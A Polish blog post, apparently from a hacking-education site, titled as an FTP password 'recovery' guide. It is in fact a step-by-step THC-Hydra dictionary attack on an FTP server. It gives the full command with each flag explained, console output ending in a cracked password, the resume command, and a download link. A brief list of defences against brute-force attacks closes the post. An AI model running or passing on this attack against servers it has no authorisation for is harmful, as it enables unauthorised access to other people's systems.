Jak włamać się do ftp? A raczej jak odzyskać hasło! Kolejny z cyklu short wpisów. Tym razem dowiemy się jak możemy odzyskać hasło do serwera za pomocą THC-Hydra (atak słownikowy). Skuteczność metody zależy od konfiguracji serwera, główną bolączką może być banowanie IP osoby próbującej się zalogować zbyt wiele razy lub ustawiony długi czas oczekiwania pomiędzy logowaniami. Metoda na pewno jest wydajniejsza niż ręczne wpisywania hasła.

Jeżeli nie masz pojęcia na czym polega ten atak i jak uruchomić Hydre to zapraszamy do jednego z poprzednich wpisów, w którym znajduje się również film w polskiej wersji językowej pt. „Łamanie hasła routera”.

Jak włamac sie do ftp? – praktyka

Przejdźmy od razu do próby odzyskania hasła do serwera FTP.

1. Wykonujemy pierwsze 10 kroków z wpisu „Łamanie hasła routera?”  z sekcji o nazwie „Zaczynamy nr 1!„.
2. Teraz wydajemy polecenie (Hydra dla Windows nieco dalej w wpisie do pobrania):

   hydra.exe -l hakerLogin -P imiona.txt -t25 192.168.0.102 ftp

Wyjaśnienie:

• hydra.exe – nazwa uruchamianego programu
• -l hakerLogin –  login do serwera ftp
• -P imiona.txt – zbiór potencjalnych haseł do serwera ftp w słowniku
•  -t 25 – ilość wątków w systemie (może wielowątkowość czasem przyspieszać proces ataku)
• 192.168.0.102 – adres IP/domena pod którym znajduje się serwer plików FTP
• ftp – atak na usługe ftp

Przykładowy przebieg ataku wygląda następująco:

C:\Users\HakeEduPL\Desktop\THC-Hydra_Windows>hydra.exe -l hakerLogin -P imiona.txt -t25 192.168.0.102 ftp
 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent
 overwriting, you have 10 seconds to abort...
 Hydra v6.0 (c) 2011 by van Hauser / THC - use allowed only for legal purposes.
 Hydra (http://www.thc.org) starting at 2013-10-04 13:05:09
 [DATA] 25 tasks, 1 servers, 2720 login tries (l:1/p:2720), ~108 tries per task
 [DATA] attacking service ftp on port 21
 [STATUS] 200.00 tries/min, 200 tries in 00:01h, 2520 todo in 00:13h
 [STATUS] 150.00 tries/min, 450 tries in 00:03h, 2270 todo in 00:16h
 [STATUS] 125.00 tries/min, 875 tries in 00:07h, 1845 todo in 00:15h
 [STATUS] 121.75 tries/min, 1461 tries in 00:12h, 1259 todo in 00:11h
 [21][ftp] host: 192.168.0.102 login: hakerLogin password: haselko
 [STATUS] attack finished for 192.168.0.102 (waiting for childs to finish)
 Hydra (http://www.thc.org) finished at 2013-10-04 13:21:25
C:\Users\HakeEduPL\Desktop\THC-Hydra_Windows>

Warto zwrócić uwagę na pojawiającą się informacje typu [STATUS] z takimi danymi jak ilość zbadanych haseł na sekundę (tries/min) jak i ilość przebadanych haseł w odpowiedniej jednostce czasu.

>> THC-Hydra – wersja dla Windows [POBIERZ TUTAJ] <<

W każdym za pomocą ctrl+c możemy przerwać atak słownikowy w celu kontynuowania go w przyszłości, wystarczy wpisać:

hydra.exe -R

Niestety „odzyskiwanie hasła” jest uzależnione od ustawionego tzn. login timeout, czyli czasu który jest wymagany do możliwego ponownego logowania na dane konto.

Jako ciekawostkę dodam że istnieje również graficzna wersja (x)Hydry:

Obrona przed tego typami atakmi brute-force na ftp

• Zmianie domyślnych portów ftp (21 na inny) w celu zamaskowania usługi.
• Ograniczeniu w konfiguracji liczby wątków na serwerze w celu ograniczenia obsługiwania wielu prób logowania naraz, bądź ograniczenie liczby maksymalnej użykowników.
• Ustawienie wysokich czasów różnych parametrów z rodziny timeout w celu ograniczenia szybkości tego ataku a zarazem obniżając skutecznie ich powodzenie.
• Włączenie autobanowania adresów IP, na daną jednostke czasu, w razie niepowodzenia n razy logowania.
• Włączenie i przeglądanie logów, w celu weryfikacji podejrzanych masowych logowań.

Jeśli to czytasz może zainteresuje Cię jeszcze:

• Zupełnie darmowe konto FTP – wybór i konfiguracja
• Powinieneś śledzić nas na Facebooku TUTAJ

Pozdrawiamy! 🙂